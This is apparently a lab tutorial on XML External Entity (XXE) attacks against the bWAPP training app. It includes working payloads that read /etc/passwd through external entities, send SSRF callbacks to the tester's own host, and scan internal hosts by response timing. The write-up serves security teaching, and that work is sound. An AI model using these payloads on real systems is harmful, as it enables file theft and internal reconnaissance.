XXE - XML External Entity

XXE - XML External Entity

XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

Detecting XML External Entity

For the purpose of this experiment, we are going to use bWAPP vulnerable web application. we will click on Any bugs and then intercept the request in our burpsuite.

As you can see from the above image, the webapp was using xml to submit data to the server, which is then rendered and displayed on the web page. By examining the response, we will find out that it is rendering and displaying anything in between <login> </login> .

XML Parser

To make sure that it is using xml parser, we will attempt to break an xml syntax on the backend by supplying >><, this may provide us with xml syntax error.

Above image shows an xml syntax error message, implying that the backend is using an xml parser.

XML Entity.

To determine whether or not XML Entity is enabled, We will supply the following payload, which if successfull will replace bee with our given text, which is xxe.

<?xml version="1.0"?>
	<!DOCTYPE foo [ <!ENTITY exploit "xxe">]>
	<reset>
		<login>
			&exploit;
		</login>
		<secret>
			Any bugs?
		</secret>
	</reset>

As you can see bee has been replaced with xxe, indicating XMl Entity is enabled.

Exploitation

Reading File /etc/passwd

Given that xml entity is enabled, we can take advantage of it to read internal files such as /etc/passwd, /etc/shadow, /etc/hostname and much more. We will use the following payload.

<?xml version="1.0"?>
	<!DOCTYPE foo [ <!ENTITY file  SYSTEM "file:///etc/passwd">]>
	<reset>
		<login>
			&file;
		</login>
		<secret>
			Any bugs?
		</secret>
	</reset>

As you can see, we were able to retrieved content of /etc/passwd.

SSRF - Server-side Request Forgery

We can leverage xxe to conduct ssrf. To do that, we will update our payload in such way that it will send a request to our server i.e python3 -m http.server.

<?xml version="1.0"?>
	<!DOCTYPE foo [ <!ENTITY ping  SYSTEM "http://[your_host]">]>
	<reset>
		<login>
			&ping;
		</login>
		<secret>
			Any bugs?
		</secret>
	</reset>

The below image shows a request has been received from our target.

Scanning

We can also conduct a scanning to discover live hosts by examining the time-taken of the response. Our target will take long time to response if our supplied host(ip address ) is down. This will allow us to discover hosts that are alive.

<?xml version="1.0"?>
	<!DOCTYPE foo [ <!ENTITY ping SYSTEM "http://[your_host]">]>
	<reset>
		<login>
			&ping;
		</login>
		<secret>
			Any bugs?
		</secret>
	</reset>

As you can see we were able to get response immediately, implying that the host is alive.

As you can see the response took long time, implying that the host is down.

Mitigations

• Disable DTDs (External Entities) completely.

References

• https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity
• https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing
• https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html